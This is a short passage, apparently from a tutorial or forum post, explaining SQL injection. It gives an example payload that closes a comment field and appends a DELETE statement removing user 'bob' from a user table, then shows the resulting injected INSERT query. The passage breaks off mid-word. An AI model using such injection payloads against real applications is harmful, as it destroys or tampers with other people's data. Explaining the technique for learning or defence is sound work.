For example: Code:-- Deleting the row containing the username 'bob' from the user table-- Code to do this is: DELETE FROM user WHERE username='bob'-- So the injection code would be: comment'); DELETE FROM user WHERE username='bob'; -- -- Note: There is a space at the very end of the SQL injection code!!!INSERT INTO txtcomment (id,comment) VALUES (10, 'comment'); DELETE FROM user WHERE username='bo